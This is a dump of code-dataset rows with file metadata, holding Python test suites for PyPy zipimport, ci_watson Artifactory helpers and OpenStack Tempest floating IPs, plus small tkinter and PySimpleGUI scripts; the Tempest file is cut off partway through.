| 42.820896 | 114 | 0.601255 | 1,124 | 8,607 | 4.47153 | 0.161032 | 0.112813 | 0.10386 | 0.14226 | 0.54238 | 0.491643 | 0.445285 | 0.289694 | 0.176681 | 0.153203 | 0 | 0.013322 | 0.293598 | 8,607 | 200 | 115 | 43.035 | 0.813322 | 0.002905 | 0 | 0.177419 | 0 | 0 | 0.103147 | 0.032751 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043011 | false | 0.005376 | 0.043011 | 0.016129 | 0.145161 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e95b2f0fc3fa299ec545b3a5144e1b174998b5 | 14,085 | py | Python | pypy/module/zipimport/test/test_zipimport.py | Qointum/pypy | c0ed88efbc135a75a535f4534ca1f3baf0bf39d8 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zipimport/test/test_zipimport.py | Qointum/pypy | c0ed88efbc135a75a535f4534ca1f3baf0bf39d8 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zipimport/test/test_zipimport.py | Qointum/pypy | c0ed88efbc135a75a535f4534ca1f3baf0bf39d8 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | import inspect
import os
import time
from zipfile import ZIP_STORED
from pypy.module.imp.test.support import BaseImportTest
from rpython.tool.udir import udir
class AppTestZipimport(BaseImportTest):
""" A bit structurized tests stolen and adapted from
cpy's regression tests
"""
compression = ZIP_STORED
spaceconfig = {
"usemodules": ['zipimport', 'time', 'struct', 'binascii', 'marshal'],
}
pathsep = os.path.sep
@classmethod
def make_class(cls):
BaseImportTest.setup_class.im_func(cls)
space = cls.space
w = space.wrap
cls.w_appdirect = w(cls.runappdirect)
cls.w_now = w(time.time())
cls.w_compression = w(cls.compression)
cls.w_pathsep = w(cls.pathsep)
cls.tmpdir = udir.ensure('zipimport_%s_%s' % (__name__, cls.__name__),
dir=1)
ziptestmodule = cls.tmpdir.join("somezip.zip")
cls.w_tmpzip = w(str(ziptestmodule))
# Cache get_pyc()
get_pyc_source = inspect.getsource(
cls.w__get_pyc.im_func).splitlines()[1:]
get_pyc_source.insert(0, ' (mtime):')
cls.w__test_pyc = space.appexec([cls.w_now], '\n'.join(get_pyc_source))
def setup_class(cls):
cls.make_class()
def setup_method(self, meth):
space = self.space
name = "test_%s_%s.zip" % (self.__class__.__name__, meth.__name__)
self.w_zipfile = space.wrap(str(self.tmpdir.join(name)))
self.w_write_files = space.newlist([])
w_cache = space.getattr(space.getbuiltinmodule('zipimport'),
space.wrap('_zip_directory_cache'))
space.call_function(space.getattr(w_cache, space.wrap('clear')))
self.w_modules = space.call_function(
space.w_list,
space.getattr(space.getbuiltinmodule('sys'),
space.wrap('modules')))
def teardown_method(self, meth):
space = self.space
space.appexec([], """():
import sys
while sys.path[0].endswith('.zip'):
sys.path.pop(0)
""")
space.appexec([self.w_modules], """(modules):
import sys
for module in sys.modules.copy():
if module not in modules:
del sys.modules[module]
""")
self.w_modules = []
def w_get_pyc(self):
# always create the pyc on the host under appdirect, otherwise
# the pre-made copy is fine
return self._get_pyc(self.now) if self.appdirect else self._test_pyc
def w__get_pyc(self, mtime):
import imp
import marshal
if type(mtime) is float:
# Mac mtimes need a bit of special casing
if mtime < 0x7fffffff:
mtime = int(mtime)
else:
mtime = int(-0x100000000 + int(mtime))
mtimeb = int(mtime).to_bytes(4, 'little', signed=True)
source = """\
def get_name():
return __name__
def get_file():
return __file__"""
data = marshal.dumps(compile(source, 'uuu.py', 'exec'))
return imp.get_magic() + mtimeb + data
def w_now_in_the_future(self, delta):
self.now += delta
def w_writefile(self, filename, data):
import sys
import time
from zipfile import ZipFile, ZipInfo
z = ZipFile(self.zipfile, 'w')
write_files = self.write_files
filename = filename.replace('/', self.pathsep)
write_files.append((filename, data))
for filename, data in write_files:
zinfo = ZipInfo(filename, time.localtime(self.now))
zinfo.compress_type = self.compression
z.writestr(zinfo, data)
self.write_files = write_files
# XXX populates sys.path, but at applevel
if sys.path[0] != self.zipfile:
sys.path.insert(0, self.zipfile)
z.close()
def test_cache(self):
self.writefile('x.py', 'y')
from zipimport import _zip_directory_cache, zipimporter
new_importer = zipimporter(self.zipfile)
try:
assert zipimporter(self.zipfile) is not new_importer
finally:
del _zip_directory_cache[self.zipfile]
def test_cache_subdir(self):
import os
self.writefile('x.py', '')
self.writefile('sub/__init__.py', '')
self.writefile('sub/yy.py', '')
from zipimport import _zip_directory_cache, zipimporter
sub_importer = zipimporter(self.zipfile + os.path.sep + 'sub')
main_importer = zipimporter(self.zipfile)
assert main_importer is not sub_importer
assert main_importer.prefix == ""
assert sub_importer.prefix == "sub" + os.path.sep
def test_good_bad_arguments(self):
from zipimport import zipimporter
import os
self.writefile("x.py", "y")
zipimporter(self.zipfile) # should work
raises(ImportError, "zipimporter(os.path.dirname(self.zipfile))")
raises(ImportError, 'zipimporter("fsafdetrssffdsagadfsafdssadasa")')
name = os.path.join(os.path.dirname(self.zipfile), "x.zip")
f = open(name, "w")
f.write("zzz")
f.close()
raises(ImportError, 'zipimporter(name)')
# this should work as well :-/
zipimporter(os.path.join(self.zipfile, 'x'))
def test_py(self):
import sys, os
self.writefile("uuu.py", "def f(x): return x")
mod = __import__('uuu', globals(), locals(), [])
assert mod.f(3) == 3
expected = {
'__doc__' : None,
'__name__' : 'uuu',
'f': mod.f}
for key, val in expected.items():
assert mod.__dict__[key] == val
assert mod.__file__.endswith('.zip'+os.sep+'uuu.py')
def test_pyc(self):
import sys, os
self.writefile("uuu.pyc", self.get_pyc())
self.writefile("uuu.py", "def f(x): return x")
mod = __import__('uuu', globals(), locals(), [])
expected = {
'__doc__' : None,
'__name__' : 'uuu',
'get_name' : mod.get_name,
'get_file' : mod.get_file
}
for key, val in expected.items():
assert mod.__dict__[key] == val
assert mod.__file__.endswith('.zip'+os.sep+'uuu.pyc')
assert mod.get_file() == mod.__file__
assert mod.get_name() == mod.__name__
#
import zipimport
z = zipimport.zipimporter(self.zipfile)
code = z.get_code('uuu')
assert isinstance(code, type((lambda:0).__code__))
def test_bad_pyc(self):
import zipimport
import sys
m0 = self.get_pyc()[0]
m0 ^= 0x04
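        # flipping one bit of the first magic byte makes the .pyc header invalid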
test_pyc = bytes([m0]) + self.get_pyc()[1:]
self.writefile("uu.pyc", test_pyc)
raises(zipimport.ZipImportError,
"__import__('uu', globals(), locals(), [])")
assert 'uu' not in sys.modules
def test_force_py(self):
import sys
m0 = self.get_pyc()[0]
m0 ^= 0x04
test_pyc = bytes([m0]) + self.get_pyc()[1:]
self.writefile("uu.pyc", test_pyc)
self.writefile("uu.py", "def f(x): return x")
mod = __import__("uu", globals(), locals(), [])
assert mod.f(3) == 3
def test_sys_modules(self):
m0 = self.get_pyc()[0]
m0 ^= 0x04
test_pyc = bytes([m0]) + self.get_pyc()[1:]
self.writefile("uuu.pyc", test_pyc)
import sys
import zipimport
z = zipimport.zipimporter(self.zipfile)
sys.modules['uuu'] = lambda x : x + 1
raises(ImportError, z.load_module, 'uuu')
raises(zipimport.ZipImportError, z.get_code, 'uuu')
def test_package(self):
import os, sys
self.writefile("xxuuu/__init__.py", "")
self.writefile("xxuuu/yy.py", "def f(x): return x")
mod = __import__("xxuuu", globals(), locals(), ['yy'])
assert mod.__path__ == [self.zipfile + os.path.sep + "xxuuu"]
assert mod.__file__ == (self.zipfile + os.path.sep
+ "xxuuu" + os.path.sep
+ "__init__.py")
assert mod.yy.f(3) == 3
def test_package_bug(self):
import os, sys
import types
mod = types.ModuleType('xxuuv')
mod.__path__ = [self.zipfile + '/xxuuv']
sys.modules['xxuuv'] = mod
#
self.writefile("xxuuv/__init__.py", "")
self.writefile("xxuuv/yy.py", "def f(x): return x")
mod = __import__("xxuuv.yy", globals(), locals(), ['__doc__'])
assert mod.__file__ == (self.zipfile + os.path.sep
+ "xxuuv" + os.path.sep
+ "yy.py")
assert mod.f(3) == 3
def test_pyc_in_package(self):
import os, sys
import types
mod = types.ModuleType('xxuuw')
mod.__path__ = [self.zipfile + '/xxuuw']
sys.modules['xxuuw'] = mod
#
self.writefile("xxuuw/__init__.py", "")
self.writefile("xxuuw/zz.pyc", self.get_pyc())
mod = __import__("xxuuw.zz", globals(), locals(), ['__doc__'])
assert mod.__file__ == (self.zipfile + os.path.sep
+ "xxuuw" + os.path.sep
+ "zz.pyc")
assert mod.get_file() == mod.__file__
assert mod.get_name() == mod.__name__
def test_functions(self):
import os
import zipimport
data = b"saddsadsa"
pyc_data = self.get_pyc()
self.now_in_the_future(+5) # write the zipfile 5 secs after the .pyc
self.writefile("xxx", data)
self.writefile("xx/__init__.py", "5")
self.writefile("yy.py", "3")
self.writefile('uu.pyc', pyc_data)
z = zipimport.zipimporter(self.zipfile)
assert z.get_data(self.zipfile + os.sep + "xxx") == data
assert z.is_package("xx")
assert not z.is_package("yy")
assert z.get_source("yy") == '3'
assert z.get_source('uu') is None
raises(ImportError, "z.get_source('zz')")
#assert z.get_code('yy') == py.code.Source('3').compile()
#assert z.get_code('uu') == self.co
assert z.get_code('uu')
assert z.get_code('xx')
assert z.get_source('xx') == "5"
assert z.archive == self.zipfile
mod = z.load_module('xx')
assert z.get_filename('xx') == mod.__file__
def test_archive(self):
"""
The archive attribute of zipimport.zipimporter gives the path to the
zipfile itself.
"""
import os
import zipimport
self.writefile("directory/package/__init__.py", "")
importer = zipimport.zipimporter(self.zipfile + "/directory")
        # Grab this so if the assertion fails, py.test will display its
        # value. Not sure why it doesn't when the assertion uses
        # importer.archive directly. -exarkun
archive = importer.archive
realprefix = importer.prefix
allbutlast = self.zipfile.split(os.path.sep)[:-1]
prefix = 'directory' + os.path.sep
assert archive == self.zipfile
assert realprefix == prefix
def test_subdirectory_importer(self):
import os
import zipimport
self.writefile("directory/package/__init__.py", "")
z = zipimport.zipimporter(self.zipfile + "/directory")
mod = z.load_module("package")
assert z.is_package("package")
assert z.get_filename("package") == mod.__file__
def test_subdirectory_twice(self):
#import os, zipimport
self.writefile("package/__init__.py", "")
self.writefile("package/subpackage/__init__.py", "")
self.writefile("package/subpackage/foo.py", "")
mod = __import__('package.subpackage.foo', None, None, [])
assert mod
def test_zip_directory_cache(self):
""" Check full dictionary interface
"""
import os
import zipimport
if self.appdirect:
# py3k's appdirect startup may populate _zip_directory_cache
zipimport._zip_directory_cache.clear()
self.writefile("directory/package/__init__.py", "")
importer = zipimport.zipimporter(self.zipfile + "/directory")
l = [i for i in zipimport._zip_directory_cache]
assert len(l) == 1
k = list(zipimport._zip_directory_cache[l[0]].keys())
assert k[0] == os.path.sep.join(['directory','package','__init__.py'])
def test_path_hooks(self):
import sys
import zipimport
assert sys.path_hooks.count(zipimport.zipimporter) == 1
def test_co_filename(self):
self.writefile('mymodule.py', """
def get_co_filename():
return get_co_filename.__code__.co_filename
""")
import os
expected = self.zipfile + os.sep + 'mymodule.py'
#
import mymodule
co_filename = mymodule.get_co_filename()
assert co_filename == expected
#
import zipimport
z = zipimport.zipimporter(self.zipfile)
code = z.get_code('mymodule')
co_filename = code.co_filename
assert co_filename == expected
def test_unencodable(self):
if not self.testfn_unencodable:
skip("need an unencodable filename")
import os
import time
import zipimport
from zipfile import ZipFile, ZipInfo
filename = self.testfn_unencodable + ".zip"
z = ZipFile(filename, "w")
zinfo = ZipInfo("uu.py", time.localtime(self.now))
zinfo.compress_type = self.compression
z.writestr(zinfo, '')
z.close()
try:
zipimport.zipimporter(filename)
finally:
os.remove(filename)
def test_import_exception(self):
self.writefile('x1test.py', '1/0')
self.writefile('x1test/__init__.py', 'raise ValueError')
raises(ValueError, __import__, 'x1test', None, None, [])
if os.sep != '/':
class AppTestNativePathSep(AppTestZipimport):
pathsep = os.sep
| 35.748731 | 79 | 0.581328 | 1,683 | 14,085 | 4.619727 | 0.16221 | 0.051833 | 0.015048 | 0.02791 | 0.310868 | 0.242315 | 0.207074 | 0.17492 | 0.167717 | 0.149968 | 0 | 0.007202 | 0.290238 | 14,085 | 393 | 80 | 35.839695 | 0.770531 | 0.055236 | 0 | 0.303681 | 0 | 0 | 0.125501 | 0.023876 | 0 | 0 | 0.002493 | 0 | 0.128834 | 1 | 0.08589 | false | 0 | 0.291411 | 0.003067 | 0.411043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8eb43bfa86fde6c237561d422bad05792d0797c | 1,371 | py | Python | scripts/about.py | btirumala1219/Py-Node | e21f1fa9ea6f46291da2414a7669e415bdfdda36 | [
"MIT"
] | 1 | 2018-04-03T15:37:30.000Z | 2018-04-03T15:37:30.000Z | scripts/about.py | btirumala1219/Py-Node | e21f1fa9ea6f46291da2414a7669e415bdfdda36 | [
"MIT"
] | null | null | null | scripts/about.py | btirumala1219/Py-Node | e21f1fa9ea6f46291da2414a7669e415bdfdda36 | [
"MIT"
] | null | null | null | import tkinter
import os
#fpath = os.path.join(direct, "about.txt")
file = open("../docs/about.txt", "r")
#print(file.read())
name = file.readline()
#print(name)
data = file.readline()
#print(data)
file.close()
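# Equivalent sketch with a context manager (same ../docs/about.txt layout
# assumed), which closes the handle automatically:
#   with open("../docs/about.txt", "r") as f:
#       name = f.readline()
#       data = f.readline()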
class testabout(tkinter.Tk):
def __init__(self,parent):
tkinter.Tk.__init__(self,parent)
self.parent = parent
self.minsize(width=500, height=400)
self.resizable(False,False)
self.geometry(self.geometry())
self.initialize()
def initialize(self):
self.grid()
var = tkinter.StringVar()
label = tkinter.Label(self, textvariable = var)
var.set(name)
label.grid(column=0,row=0)
var1 = tkinter.StringVar()
labell = tkinter.Label(self, textvariable = var1)
var1.set(data)
labell.grid(column=0,row=1)
# QUIT BUTTON FRAME
containerquit = tkinter.Frame(self, borderwidth=1, relief="sunken", width=125, height=75)
containerquit.place(x=250, y=200)
containerquit.grid_propagate(False)
containerquit.grid_columnconfigure(0,weight=1)
# QUIT BUTTON
quitButton = tkinter.Button(containerquit, text="Quit",command=self.quit, height=3)
quitButton.grid(row=0, column=0, sticky="EW")
if __name__ == "__main__":
app = testabout(None)
app.title('V1_APP')
app.mainloop()
| 27.42 | 97 | 0.634573 | 169 | 1,371 | 5.035503 | 0.455621 | 0.035253 | 0.039953 | 0.065805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029163 | 0.224654 | 1,371 | 49 | 98 | 27.979592 | 0.771402 | 0.080963 | 0 | 0 | 0 | 0 | 0.035088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f04b85bf455ecd408ba5d0f8a2993fd5780768 | 10,989 | py | Python | tests/test_artifactory_helpers.py | jhunkeler/ci_watson | b3fe2de27dca9ca567db6a43e264cc6110ec2c7b | [
"BSD-3-Clause"
] | 1 | 2018-08-07T21:04:00.000Z | 2018-08-07T21:04:00.000Z | tests/test_artifactory_helpers.py | jhunkeler/ci_watson | b3fe2de27dca9ca567db6a43e264cc6110ec2c7b | [
"BSD-3-Clause"
] | 46 | 2018-08-07T21:02:15.000Z | 2022-03-09T14:29:15.000Z | tests/test_artifactory_helpers.py | jhunkeler/ci_watson | b3fe2de27dca9ca567db6a43e264cc6110ec2c7b | [
"BSD-3-Clause"
] | 8 | 2018-08-07T21:03:49.000Z | 2022-03-03T17:48:38.000Z | """
Tests requiring internet connection are treated as if they are big data tests.
We could use pytest-remotedata plugin but requiring another plugin to test
a plugin package is a little too meta.
"""
import json
import os
import pytest
from ci_watson.artifactory_helpers import (
HAS_ASTROPY, BigdataError, get_bigdata_root, get_bigdata,
check_url, compare_outputs, generate_upload_params, generate_upload_schema)
@pytest.mark.bigdata
@pytest.mark.parametrize(
('val', 'ans'),
[('/local/path', False),
('https://google.com', True),
('https://github.com/spacetelescopehstcalblahblah', False)])
def test_check_url(val, ans):
assert check_url(val) is ans
class TestBigdataRoot:
def setup_class(self):
self.key = 'FOOFOO'
def teardown_class(self):
if self.key in os.environ:
del os.environ[self.key]
def test_no_env(self):
if self.key in os.environ:
del os.environ[self.key]
with pytest.raises(BigdataError):
get_bigdata_root(envkey=self.key)
@pytest.mark.bigdata
def test_has_env_url(self):
path = 'https://google.com'
os.environ[self.key] = path
assert get_bigdata_root(envkey=self.key) == path
def test_has_env_local(self):
path = os.path.abspath(os.curdir)
os.environ[self.key] = path
assert get_bigdata_root(envkey=self.key) == path
def test_no_path(self):
os.environ[self.key] = '/some/fake/path'
assert get_bigdata_root(envkey=self.key) is None
@pytest.mark.bigdata
class TestGetBigdata:
def setup_class(self):
self.root = get_bigdata_root()
def test_nocopy(self, _jail, pytestconfig):
args = (pytestconfig.getini('inputs_root')[0],
'dev',
'input',
'j6lq01010_asn.fits')
dest = get_bigdata(*args, docopy=False)
assert dest == os.path.abspath(os.path.join(self.root, *args))
assert len(os.listdir()) == 0
@pytest.mark.parametrize('docopy', [True, False])
def test_no_data(self, docopy):
with pytest.raises(BigdataError):
get_bigdata('fake', 'path', 'somefile.txt', docopy=docopy)
def test_get_data(self, _jail, pytestconfig):
"""
This tests download when TEST_BIGDATA is pointing to Artifactory.
And tests copy when it is pointing to local path.
"""
args = (pytestconfig.getini('inputs_root')[0],
'dev',
'input',
'j6lq01010_asn.fits')
dest = get_bigdata(*args)
assert dest == os.path.abspath(os.path.join(os.curdir, args[-1]))
@pytest.mark.bigdata
@pytest.mark.usefixtures('_jail')
@pytest.mark.skipif(not HAS_ASTROPY, reason='requires astropy to run')
class TestCompareOutputs:
"""
Test a few common comparison scenarios.
FITSDiff and HDUDiff are tested in Astropy, so here we simply
test if they report differences or not, but we do not check
the content too closely.
.. note:: Upload schema functions are tested separately elsewhere.
"""
def setup_class(self):
self.inpath = ('ci-watson', 'dev', 'input')
if os.environ.get('TEST_BIGDATA').startswith('http'):
self.copy = True
else:
self.copy = False
def test_raise_error_fits(self):
"""Test mismatched extensions from the same file."""
get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)
outputs = [('j6lq01010_asn.fits[PRIMARY]', 'j6lq01010_asn.fits[asn]')]
with pytest.raises(AssertionError) as exc:
compare_outputs(outputs, input_path=self.inpath,
docopy=self.copy, verbose=False)
assert 'Headers contain differences' in str(exc)
def test_difference_ascii(self):
"""
Test ASCII with differences but suppress error to inspect
returned report.
"""
get_bigdata(*self.inpath, 'j6lq01010_asn_mod.txt', docopy=True)
report = compare_outputs(
[('j6lq01010_asn_mod.txt', 'j6lq01010_asn.txt')],
input_path=self.inpath, docopy=self.copy, verbose=False,
raise_error=False)
s = report.split(os.linesep)
assert s[2:] == ['@@ -1,4 +1,4 @@',
' # MEMNAME MEMTYPE MEMPRSNT',
'-J6LQ01NAQ EXP-CRJ 2',
'+J6LQ01NAQ EXP-CRJ 1',
' J6LQ01NDQ EXP-CRJ 1',
'-J6LQ01013 PROD-RPT 1',
'+J6LQ01011 PROD-CRJ 1',
'']
@pytest.mark.parametrize(
'filename', ['j6lq01010_asn.fits', 'j6lq01010_asn.txt'])
def test_all_okay(self, filename):
"""Same file has no difference."""
get_bigdata(*self.inpath, filename, docopy=True)
report = compare_outputs(
[(filename, filename)], input_path=self.inpath,
docopy=self.copy, verbose=False)
assert 'No differences found' in report
@pytest.mark.parametrize('docopy', [False, True])
def test_truth_missing(self, docopy):
get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)
with pytest.raises(AssertionError) as exc:
compare_outputs(
[('j6lq01010_asn.fits', 'doesnotexist.fits')],
input_path=self.inpath, docopy=docopy, verbose=False)
assert 'Cannot find doesnotexist.fits' in str(exc)
@pytest.mark.parametrize(
'outputs',
[[('j6lq01010_asn.fits[ASN]', 'j6lq01010_asn_mod.fits', ['image'])],
[('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits[ASN]', ['image'])]])
def test_ambiguous_extlist(self, outputs):
"""Too many ways to do the same thing."""
get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)
with pytest.raises(AssertionError) as exc:
compare_outputs(outputs, input_path=self.inpath, docopy=self.copy,
verbose=False)
assert 'Ambiguous extension requirements' in str(exc)
def test_mixed_bunch(self):
"""
Test different forms of acceptable ``outputs``.
.. note:: Some other crazy combos are theoretically possible given
the logic but they are not officially supported, hence
not tested here. Add new combo as its support is added.
"""
for filename in ('j6lq01010_asn.fits', 'j6lq01010_asn.txt'):
get_bigdata(*self.inpath, filename, docopy=True)
outputs = [('j6lq01010_asn.fits', 'j6lq01010_asn.fits'),
('j6lq01010_asn.fits[asn]', 'j6lq01010_asn.fits[ASN]'),
{'files': ('j6lq01010_asn.fits[image]',
'j6lq01010_asn_mod.fits[IMAGE]'),
'pars': {'rtol': 1e-7, 'atol': 0.05}},
{'files': ('j6lq01010_asn.fits',
'j6lq01010_asn_mod.fits',
['image']),
'pars': {'rtol': 1e-7, 'atol': 0.05}},
{'files': ('j6lq01010_asn.txt', 'j6lq01010_asn.txt')},
('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits',
['primary', 'IMAGE']),
('j6lq01010_asn.txt', 'j6lq01010_asn.txt')]
report = compare_outputs(
outputs, input_path=self.inpath, docopy=self.copy,
verbose=False, raise_error=False)
# There are 7 comparisons, and only 1 should show a difference
assert report.count("No differences found") == 6
assert report.count("different pixels found") == 1
class TestGenerateUploadParams:
def setup_class(self):
self.old_envs = {}
for key in ('BUILD_TAG', 'BUILD_MATRIX_SUFFIX'):
self.old_envs[key] = os.environ.get(key)
# Set up something reproducible
os.environ['BUILD_TAG'] = 'tag0'
os.environ['BUILD_MATRIX_SUFFIX'] = 'foo'
def teardown_class(self):
for key, val in self.old_envs.items():
if val is None:
del os.environ[key]
else:
os.environ[key] = val
def test_gen(self, _jail):
# Dummy file to move.
datafile = 'actual.txt'
with open(datafile, 'w') as f:
f.write('\n')
updated_outputs = [(datafile, '/path/to/desired.txt')]
schema_pattern, tree, testname = generate_upload_params(
'groot', updated_outputs, verbose=False)
assert schema_pattern == ['*.log', os.path.abspath('desired.txt')]
assert isinstance(testname, str) # Actual value non-deterministic
# TODO: Use regex?
split_tree = tree.split(os.sep)
assert split_tree[0] == 'groot'
assert split_tree[1].endswith('_tag0_foo')
assert split_tree[3] == ''
# Make sure file is moved properly.
dirlist = os.listdir()
assert dirlist == ['desired.txt']
def test_generate_upload_schema_multi(_jail):
generate_upload_schema(
['*.log', 'desired.txt'], 'reponame/repopath', 'foo')
# TODO: Better way to compare JSON?
with open('foo_results.json') as f:
j = json.load(f)
assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [
'{',
' "files": [',
' {',
' "excludePatterns": [],',
' "explode": "false",',
' "flat": "true",',
' "pattern": "*.log",',
' "props": null,',
' "recursive": "false",',
' "regexp": "false",',
' "target": "reponame/repopath"',
' },',
' {',
' "excludePatterns": [],',
' "explode": "false",',
' "flat": "true",',
' "pattern": "desired.txt",',
' "props": null,',
' "recursive": "false",',
' "regexp": "false",',
' "target": "reponame/repopath"',
' }',
' ]',
'}']
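    # Re the TODO above: one option is to parse an expected structure and
    # compare dicts directly (sketch; `expected` is illustrative):
    #   assert j == expected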
def test_generate_upload_schema_one(_jail):
generate_upload_schema(
'desired.txt', 'reponame/repopath', 'foo', recursive=True)
# TODO: Better way to compare JSON?
with open('foo_results.json') as f:
j = json.load(f)
assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [
'{',
' "files": [',
' {',
' "excludePatterns": [],',
' "explode": "false",',
' "flat": "true",',
' "pattern": "desired.txt",',
' "props": null,',
' "recursive": "true",',
' "regexp": "false",',
' "target": "reponame/repopath"',
' }',
' ]',
'}']
| 36.752508 | 79 | 0.557922 | 1,211 | 10,989 | 4.921552 | 0.247729 | 0.066443 | 0.051007 | 0.029362 | 0.435067 | 0.367953 | 0.307718 | 0.28255 | 0.265268 | 0.241779 | 0 | 0.033439 | 0.308763 | 10,989 | 298 | 80 | 36.875839 | 0.751185 | 0.11466 | 0 | 0.419355 | 0 | 0 | 0.252485 | 0.032228 | 0 | 0 | 0 | 0.003356 | 0.115207 | 1 | 0.105991 | false | 0 | 0.018433 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f1c240711d8e04a35bb7689d16fee5a9b85ef7 | 1,508 | py | Python | MyLibrary.py | peternewman22/MyLibrary | edd584244ddc4675947f5c89f05e0dfc88145d20 | [
"MIT"
] | null | null | null | MyLibrary.py | peternewman22/MyLibrary | edd584244ddc4675947f5c89f05e0dfc88145d20 | [
"MIT"
] | null | null | null | MyLibrary.py | peternewman22/MyLibrary | edd584244ddc4675947f5c89f05e0dfc88145d20 | [
"MIT"
] | null | null | null | from decouple import config
import csv
from datetime import datetime
import logging
from Gui import Gui
import PySimpleGUI as sg
# logging.basicConfig(filename = 'mylibrary.log', filemode = 'w', level=logging.DEBUG, format='%(asctime)s - %(message)s')
class MyLibrary:
def __init__(self, debugOn):
self.debugOn = debugOn
self.filename = sg.popup_get_file('Choose a document to save to')
self.apiKey = config('KEY')
self.metadata = ["isbn", "title", "subtitle", "authors", "edition", "pageCount", "categories", "averageRating", "ratingsCount", "publishedDate", "publisher", "description"]
def constructRow(self, data):
"""Constructs row in the order of metadat"""
return list(map(lambda datapoint: data[datapoint], self.metadata))
def write2csv(self, row):
"""Writes to csv"""
with open(self.filename, 'a', newline='', encoding='utf8') as csv_file:
writer=csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(row)
def run(self):
self.write2csv([f"Session started: {datetime.now()}"]) #timestamping session
self.write2csv(self.metadata) # writing headers
while True:
gui = Gui(self.apiKey, self.metadata, self.debugOn)
if gui.data['Quit'] == True: # checking to see if Quit thing works
break
else:
row = self.constructRow(gui.data)
self.write2csv(row) | 41.888889 | 180 | 0.636605 | 176 | 1,508 | 5.403409 | 0.551136 | 0.050473 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004318 | 0.232095 | 1,508 | 36 | 181 | 41.888889 | 0.816926 | 0.163793 | 0 | 0 | 0 | 0 | 0.146635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f2e5a4f86d70234c1d81d00f7958c8610a8ac6 | 6,282 | py | Python | tempest/tests/lib/services/network/test_floating_ips_client.py | cityofships/tempest | 59aa6811a3664d88b8939603b8e974644fbe21fa | [
"Apache-2.0"
] | 254 | 2015-01-05T19:22:52.000Z | 2022-03-29T08:14:54.000Z | tempest/tests/lib/services/network/test_floating_ips_client.py | cityofships/tempest | 59aa6811a3664d88b8939603b8e974644fbe21fa | [
"Apache-2.0"
] | 13 | 2015-03-02T15:53:04.000Z | 2022-02-16T02:28:14.000Z | tempest/tests/lib/services/network/test_floating_ips_client.py | cityofships/tempest | 59aa6811a3664d88b8939603b8e974644fbe21fa | [
"Apache-2.0"
] | 367 | 2015-01-07T15:05:39.000Z | 2022-03-04T09:50:35.000Z | # Copyright 2017 AT&T Corporation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib.services.network import floating_ips_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services import base
class TestFloatingIPsClient(base.BaseServiceTest):
FAKE_FLOATING_IPS = {
"floatingips": [
{
"router_id": "d23abc8d-2991-4a55-ba98-2aaea84cc72f",
"description": "for test",
"dns_domain": "my-domain.org.",
"dns_name": "myfip",
"created_at": "2016-12-21T10:55:50Z",
"updated_at": "2016-12-21T10:55:53Z",
"revision_number": 1,
"project_id": "4969c491a3c74ee4af974e6d800c62de",
"tenant_id": "4969c491a3c74ee4af974e6d800c62de",
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": "10.0.0.3",
"floating_ip_address": "172.24.4.228",
"port_id": "ce705c24-c1ef-408a-bda3-7bbd946164ab",
"id": "2f245a7b-796b-4f26-9cf9-9e82d248fda7",
"status": "ACTIVE",
"port_details": {
"status": "ACTIVE",
"name": "",
"admin_state_up": True,
